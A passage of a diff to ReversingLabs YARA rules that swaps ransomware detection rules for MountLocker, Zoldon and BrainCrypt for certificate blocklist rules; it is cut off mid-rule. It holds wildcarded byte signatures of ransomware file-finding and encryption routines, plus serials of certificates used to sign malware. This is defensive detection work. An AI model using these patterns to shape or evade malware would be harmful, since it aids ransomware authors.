+		logic_hash = "2d181b9b517732f14d196c1a6c5661d8de4dbbfe6f120954dd3f9dcad00ff0fe"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "MountLocker"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files_p1 = {
-            55 8B EC 83 E4 ?? 83 EC ?? 53 56 57 8B 3D ?? ?? ?? ?? 8B DA 8B F1 FF D7 89 44 24 ??
-            33 C0 50 68 ?? ?? ?? ?? 6A ?? 50 50 68 ?? ?? ?? ?? 56 89 54 24 ?? 89 44 24 ?? FF 15
-            ?? ?? ?? ?? 89 44 24 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 8D 4C 24 ?? 51 50 FF 15 ?? ?? ??
-            ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? FF 74 24 ?? FF 74 24 ?? 6A ?? 6A ?? FF 74 24 ?? FF
-            15 ?? ?? ?? ?? 89 44 24 ?? 85 C0 0F 84 ?? ?? ?? ?? 33 C9 0F 31 89 44 8C ?? 41 83 F9
-            ?? 72 ?? FF 75 ?? 8B D3 8D 4C 24 ?? E8 ?? ?? ?? ?? 89 44 24 ?? 59 85 C0 74 ?? 8D 4C
-            24 ?? E8 ?? ?? ?? ?? 89 44 24 ?? 8B 7C 24 ?? 8B 44 24 ?? 89 7C 24 ?? 89 44 24 ?? 8B
-            35 ?? ?? ?? ?? 8B DE 8B 15 ?? ?? ?? ?? 03 DF 8B CA 89 54 24 ?? 13 C8 BF ?? ?? ?? ??
-            8B C6 F0 0F C7 0F 8B 7C 24 ?? 3B C6 8B 44 24 ?? 75 ?? 3B 54 24 ?? 75 ?? FF 74 24 ??
-            8B 35 ?? ?? ?? ?? FF D6 FF 74 24 ?? FF D6 8B 3D ?? ?? ?? ?? FF D7 8B F8 8B C2 2B 7C
-            24 ?? 89 7C 24 ?? 1B 44 24 ?? 89 44 24 ?? 75 ?? 85 FF 0F 84 ?? ?? ?? ?? 8B 35 ?? ??
-            ?? ?? 8B DE 8B 15 ?? ?? ?? ?? 03 DF 8B CA 89 54 24 ?? 13 C8 BF ?? ?? ?? ?? 8B C6 F0
-            0F C7 0F 8B 7C 24 ?? 3B C6 8B 44 24 ?? 75 ?? 3B 54 24 ?? 75 ?? 50 57 FF 74 24 ?? FF
-            74 24 ?? E8 ?? ?? ?? ?? 89 44 24 ?? 8B C2 81 E2 ?? ?? ?? ?? 25 ?? ?? ?? ?? 89 54 24
-            ?? DF 6C 24 ?? 83 64 24 ?? ?? 89 44 24 ?? DF 6C 24 ?? D9 E0 DE C1 D9 5C 24 ?? D9 44
-            24 ?? D9 05 ?? ?? ?? ?? D8 D9 DF E0 F6 C4 ?? 7A ?? D9 1D ?? ?? ?? ?? EB ?? DD D8 8B
-            44 24 ?? EB ?? 8B 44 24 ?? 85 C0 8B 35 ?? ?? ?? ?? 74 ?? 50 FF D6 FF 74 24 ?? FF D6
-            33 C0 5F 5E 5B 8B E5 5D C3
-        }
-		$encrypt_files_p2 = {
-            55 8B EC 83 EC ?? 53 56 57 33 FF 6A ?? 8B F7 5B 0F 31 6A ?? 89 86 ?? ?? ?? ?? FF 15
-            ?? ?? ?? ?? 83 C6 ?? 3B F3 72 ?? 8B D3 B9 ?? ?? ?? ?? 8A 01 88 41 ?? 41 83 EA ?? 75
-            ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 57 8D 45 ?? 89 5D ?? 50 89 7D ?? 89 7D ?? FF
-            15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 57 57 68 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B F0 85 F6 74 ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 68 ?? ??
-            ?? ?? 57 6A ?? 57 FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 ?? 8B F0 FF 15 ?? ?? ?? ?? 57 FF
-            75 ?? FF 15 ?? ?? ?? ?? 85 F6 74 ?? E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 68 ?? ?? ?? ??
-            68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 83 C4 ?? E8 ?? ?? ?? ?? 33 C0 40
-            EB ?? FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 5F 5E
-            5B 8B E5 5D C3
-        }
-		$find_files_p1 = {
-            53 55 56 8B 74 24 ?? 8B EA 57 8B F9 6A ?? 83 26 ?? 58 66 89 44 6F ?? 8D 5F ?? 33 C0
-            66 89 44 6F ?? 8D 87 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 53 89 44 24 ?? FF D0 33 C9 66 89
-            4C 6F ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 39 4F ?? 0F 84 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83
-            F8 ?? 0F 85 ?? ?? ?? ?? 8D 46 ?? 50 6A ?? 8D 4E ?? 51 8D 56 ?? 52 8D 46 ?? 50 6A ??
-            6A ?? 8D 5F ?? 53 FF 15 ?? ?? ?? ?? F7 D8 1B C0 83 C0 ?? 89 06 74 ?? 8B CB E8 ?? ??
-            ?? ?? 85 C0 74 ?? 6A ?? 58 66 89 44 6F ?? 33 C0 66 89 44 6F ?? 8D 87 ?? ?? ?? ?? 50
-            53 FF 54 24 ?? 33 C9 66 89 4C 6F ?? 83 F8 ?? 75 ?? 39 0E 74 ?? 51 FF 76 ?? FF 76 ??
-            FF 76 ?? 6A ?? 6A ?? 53 FF 15 ?? ?? ?? ?? 83 3E ?? 74 ?? FF 76 ?? FF 15 ?? ?? ?? ??
-            83 26 ?? 83 C8 ?? 5F 5E 5D 5B C3
-        }
-		$find_files_p2 = {
-            55 8B EC 83 E4 ?? 83 EC ?? 53 55 56 8B F1 57 FF 46 ?? 8D 7E ?? 8B 07 8D 5E ?? 89 44
-            24 ?? 8B 46 ?? 53 89 07 FF 15 ?? ?? ?? ?? 8D 4C 24 ?? 89 44 24 ?? 51 8B D0 8B CE E8
-            ?? ?? ?? ?? 8B E8 59 83 FD ?? 75 ?? 33 C0 E9 ?? ?? ?? ?? 53 8D 86 ?? ?? ?? ?? 50 FF
-            15 ?? ?? ?? ?? 8D 9E ?? ?? ?? ?? F6 03 ?? 74 ?? 8B 54 24 ?? 8B CE E8 ?? ?? ?? ?? EB
-            ?? 8D 86 ?? ?? ?? ?? 50 8B 44 24 ?? 05 ?? ?? ?? ?? 8D 04 46 50 FF 15 ?? ?? ?? ?? FF
-            76 ?? 57 6A ?? FF 16 83 C4 ?? 85 C0 74 ?? 53 55 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 55 FF
-            15 ?? ?? ?? ?? 83 7E ?? ?? 8D 5E ?? 74 ?? 83 7C 24 ?? ?? 74 ?? 6A ?? FF 74 24 ?? FF
-            74 24 ?? FF 74 24 ?? 6A ?? 6A ?? 53 FF 15 ?? ?? ?? ?? 83 7C 24 ?? ?? 74 ?? FF 74 24
-            ?? FF 15 ?? ?? ?? ?? 8B 4C 24 ?? 33 C0 89 0F 40 5F 5E 5D 5B 8B E5 5D C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Zhuzhou Lizhong Precision Manufacturing Technology Co., Ltd." and pe.signatures [ i ] . serial == "2d:88:c0:af:1f:e2:60:99:61:c1:71:21:3c:03:bd:23" and 1683676800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Zoldon : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_6E7Cc176062D91225Cfdcbdf5B5F0Ea5 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Zoldon ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "5d28e6f0-9d6b-54f4-81ed-aadb58352c80"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "cb6ae82f-ac1e-528d-aa17-6dc14019793c"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Zoldon.yara#L1-L107"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "4821b8506e7ba00987978f2744da1c532e03d73f3275cb15e39cdf87f6018223"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L14204-L14220"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "1d2ffa7ec3559061432c2aff23f568cb580fb9093d0af7d8a6a0b91add89c9cc"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Zoldon"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$main_encrypt_function_p1 = {
-            55 8B EC 81 C4 ?? ?? ?? ?? 33 C9 89 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 89 8D ?? ?? ??
-            ?? 89 8D ?? ?? ?? ?? 89 4D ?? 89 8D ?? ?? ?? ?? 89 4D ?? 89 4D ?? 89 55 ?? 89 45 ??
-            8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30
-            64 89 20 E8 ?? ?? ?? ?? DD 5D ?? 9B 8B 45 ?? 89 45 ?? 8B 45 ?? 89 45 ?? FF 75 ?? FF
-            75 ?? 8D 55 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 8B 55 ?? E8 ?? ?? ?? ?? B2 ??
-            A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? B1 ?? BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ??
-            3C ?? 0F 85 ?? ?? ?? ?? B0 ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ??
-            84 C0 0F 85 ?? ?? ?? ?? 8B 4D ?? BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? C6
-            80 ?? ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 66 C7 45
-        }
-		$main_encrypt_function_p2 = {
-            8D 85 ?? ?? ?? ?? 66 8B 55 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 45 ?? B9 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? 66 83 7D
-            ?? ?? 74 ?? 8D 85 ?? ?? ?? ?? 66 8B 55 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 66 FF 45 ?? 66 83 7D
-            ?? ?? 75 ?? 8B 4D ?? BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ??
-            8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8B 95 ?? ?? ?? ?? 33 C9 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 5A 59
-            59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ??
-            E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? C3
-        }
-		$write_zoldon_regkey = {
-            55 8B EC 83 C4 ?? 53 56 33 DB 89 5D ?? 88 4D ?? 8B DA 8B F0 33 C0 55 68 ?? ?? ?? ??
-            64 FF 30 64 89 20 8D 45 ?? 8B D3 E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B D8 84 DB
-            75 ?? 8D 45 ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 89 45 ?? 80 7D ??
-            ?? 74 ?? 83 7D ?? ?? 75 ?? 8D 45 ?? 50 8B 46 ?? 50 6A ?? 8B 45 ?? E8 ?? ?? ?? ?? 50
-            8B D3 8B C6 E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B D0 8B C6 E8 ?? ?? ?? ?? 88 45 ?? EB
-            ?? 8D 45 ?? 50 8D 45 ?? 50 6A ?? 8B 46 ?? 50 6A ?? 6A ?? 6A ?? 8B 45 ?? E8 ?? ?? ??
-            ?? 50 8B D3 8B C6 E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B D0 8B C6 E8 ?? ?? ?? ?? 88 45
-            ?? 80 7D ?? ?? 74 ?? 83 7E ?? ?? 0F 95 C0 84 D8 74 ?? FF 76 ?? 68 ?? ?? ?? ?? FF 75
-            ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? 8B C6 E8 ?? ?? ?? ?? 33
-            C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? C3
-        }
-		$find_files_p1 = {
-            55 8B EC 81 C4 ?? ?? ?? ?? 33 C9 89 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 89 8D ?? ?? ??
-            ?? 89 8D ?? ?? ?? ?? 89 4D ?? 89 4D ?? 89 4D ?? 89 4D ?? 89 4D ?? 89 4D ?? 89 55 ??
-            89 45 ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ??
-            64 FF 30 64 89 20 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ??
-            ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 33
-            C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 F6 85 ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8B 45
-            ?? 80 B8 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 85 C0 75 ?? B9 ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0
-            74 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 45 ?? 8B 55 ?? E8 ?? ?? ?? ?? 33 C0 55 68 ??
-            ?? ?? ?? 64 FF 30 64 89 20 8D 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10
-            68 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 8D 85 ?? ?? ?? ?? 8B
-        }
-		$find_files_p2 = {
-            8D ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? E9
-            ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? B9 ??
-            ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? E8 ?? ?? ?? ?? E9 ?? ??
-            ?? ?? 8D 45 ?? 8B 55 ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D
-            55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? E8 ??
-            ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 55 ?? E8 ??
-            ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
-            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ??
-            74 ?? 8D 45 ?? 8B 55 ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D
-            55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? E8 ??
-            ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 55 ?? E8 ??
-            ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            85 C0 0F 84 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ??
-            ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 8B E5 5D C3
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SG Internet" and pe.signatures [ i ] . serial == "6e:7c:c1:76:06:2d:91:22:5c:fd:cb:df:5b:5f:0e:a5" and 1317945600 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_Cecedd2Efc985C2Dbf0019669D270079 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "60a3e63c-4f44-5c75-9928-69859d77af3e"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L14222-L14240"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "1dfb5959db6929643126a850de84e54a84d7197518cde475c802987721b71020"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $write_zoldon_regkey ) and ( all of ( $find_files_p* ) ) and ( all of ( $main_encrypt_function_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TRANS LTD" and ( pe.signatures [ i ] . serial == "00:ce:ce:dd:2e:fc:98:5c:2d:bf:00:19:66:9d:27:00:79" or pe.signatures [ i ] . serial == "ce:ce:dd:2e:fc:98:5c:2d:bf:00:19:66:9d:27:00:79" ) and 1527811200 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Braincrypt : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_61Fe6F00Bd79684210534050Ff46Bc92 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects BrainCrypt ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "190798d5-594d-5b80-aa0e-8d7ff167f1c0"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "b88e0bbf-ab3a-51ac-8542-d4f92116f5e9"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.BrainCrypt.yara#L1-L121"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "85866d6ffa136bf3ed27bbab55ae5430af4a1363930ebacab0df9ad24f8734cb"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L14242-L14258"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "e8ebc5de081e2d1e653493a2d85699ebfb5227b7fab656468025c2043903f597"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "BrainCrypt"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$get_files_for_encryption_32 = {
-            64 8B 0D ?? ?? ?? ?? 8B 89 ?? ?? ?? ?? 3B 61 ?? 0F 86 ?? ?? ?? ?? 83 EC ?? 80 7C 24
-            ?? ?? 74 ?? 8B 5C 24 ?? 89 1C 24 8B 5C 24 ?? 89 5C 24 ?? BB ?? ?? ?? ?? 89 5C 24 ??
-            E8 ?? ?? ?? ?? 83 C4 ?? C3 83 3D ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? 8B 1D ?? ?? ?? ??
-            83 C3 ?? FC 8B 0B 89 0C 24 8B 4B ?? 89 4C 24 ?? 83 3D ?? ?? ?? ?? ?? 0F 86 ?? ?? ??
-            ?? 8B 1D ?? ?? ?? ?? 83 C3 ?? 8D 7C 24 ?? FC 8B 0B 89 0F 8B 4B ?? 89 4F ?? E8 ?? ??
-            ?? ?? 8B 5C 24 ?? 89 1D ?? ?? ?? ?? 8B 5C 24 ?? 80 3D ?? ?? ?? ?? ?? 75 ?? 89 1D ??
-            ?? ?? ?? 8B 5C 24 ?? 89 1C 24 8B 5C 24 ?? 89 5C 24 ?? BB ?? ?? ?? ?? 89 5C 24 ?? E8
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 0C 24 8B 44 24 ?? C7 04 24 ?? ?? ?? ?? 89 4C 24 ?? 89
-            4C 24 ?? 89 44 24 ?? 89 44 24 ?? BB ?? ?? ?? ?? 89 5C 24 ?? C7 44 24 ?? ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 8D 5C 24 ?? FC 8B 0B 89 0C 24 8B 4B ?? 89 4C 24 ?? E8 ?? ?? ?? ?? E9
-            ?? ?? ?? ?? BD ?? ?? ?? ?? 89 2C 24 89 5C 24 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 0F 0B E8 ?? ?? ?? ?? 0F 0B E8 ?? ?? ?? ?? E9
-        }
-		$encrypt_file_32 = {
-            64 8B 0D ?? ?? ?? ?? 8B 89 ?? ?? ?? ?? 3B 61 ?? 0F 86 ?? ?? ?? ?? 83 EC ?? 8B 5C 24
-            ?? 89 1C 24 8B 5C 24 ?? 89 5C 24 ?? E8 ?? ?? ?? ?? 8B 54 24 ?? 8B 4C 24 ?? 8B 44 24
-            ?? 89 54 24 ?? 89 14 24 89 4C 24 ?? 89 4C 24 ?? 89 44 24 ?? 89 44 24 ?? 8B 5C 24 ??
-            89 5C 24 ?? 8B 5C 24 ?? 89 5C 24 ?? 8B 5C 24 ?? 89 5C 24 ?? E8 ?? ?? ?? ?? 8B 54 24
-            ?? 8B 4C 24 ?? 8B 44 24 ?? 8B 5C 24 ?? 89 1C 24 8B 5C 24 ?? 89 5C 24 ?? 89 54 24 ??
-            89 54 24 ?? 89 4C 24 ?? 89 4C 24 ?? 89 44 24 ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 83 C4 ?? C3 E8 ?? ?? ?? ?? E9
-        }
-		$attach_to_server_32 = {
-            64 8B 0D ?? ?? ?? ?? 8B 89 ?? ?? ?? ?? 3B 61 ?? 0F 86 ?? ?? ?? ?? 83 EC ?? 31 DB 89
-            5C 24 ?? 89 5C 24 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4C 24 ?? 89 CF 83 F9 ??
-            0F 84 ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? 89 4C 24 ?? 89 0C 24 83 3C 24 ?? 0F 84 ?? ??
-            ?? ?? 8B 5C 24 ?? 89 5C 24 ?? 8B 5C 24 ?? 89 5C 24 ?? E8 ?? ?? ?? ?? 8B 5C 24 ?? 89
-            1C 24 83 3C 24 ?? 0F 84 ?? ?? ?? ?? BB ?? ?? ?? ?? 89 5C 24 ?? C7 44 24 ?? ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8B 5C 24 ?? 89 1C 24 83 3C 24 ?? 0F 84 ?? ?? ?? ?? BB ?? ?? ?? ??
-            89 5C 24 ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 5C 24 ?? 89 1C 24 83 3C 24 ??
-            0F 84 ?? ?? ?? ?? 8B 5C 24 ?? 89 5C 24 ?? 8B 5C 24 ?? 89 5C 24 ?? E8 ?? ?? ?? ?? 8B
-            44 24 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 31 DB 89 5C 24 ?? 89 5C 24 ?? 31 ED 39 E8 0F 85
-            ?? ?? ?? ?? B9 ?? ?? ?? ?? B8 ?? ?? ?? ?? 89 4C 24 ?? 89 0C 24 89 44 24 ?? 89 44 24
-            ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 8B 48 ?? 8B 68
-            ?? 89 6C 24 ?? 89 6C 24 ?? 89 4C 24 ?? 83 F9 ?? 0F 84 ?? ?? ?? ?? 8D 59 ?? C7 04 24
-            ?? ?? ?? ?? 89 5C 24 ?? E8 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? C7 04 24 ?? ?? ??
-            ?? 8B 44 24 ?? 83 F8 ?? 74 ?? 83 C0 ?? 8D 7C 24 ?? FC 8B 08 89 0F 8B 48 ?? 89 4F ??
-            E8 ?? ?? ?? ?? 8D 5C 24 ?? FC 8B 0B 89 0C 24 8B 4B ?? 89 4C 24 ?? E8 ?? ?? ?? ?? 8B
-            54 24 ?? 8B 4C 24 ?? 8B 44 24 ?? C7 04 24 ?? ?? ?? ?? 89 54 24 ?? 89 54 24 ?? 89 4C
-            24 ?? 89 4C 24 ?? 89 44 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 5C 24 ?? 89 5C 24 ?? 8B
-            5C 24 ?? 89 5C 24 ?? 90 E8 ?? ?? ?? ?? 83 C4 ?? C3
-        }
-		$get_files_for_encryption_64 = {
-            65 48 8B 0C 25 ?? ?? ?? ?? 48 8B 89 ?? ?? ?? ?? 48 3B 61 ?? 0F 86 ?? ?? ?? ?? 48 83
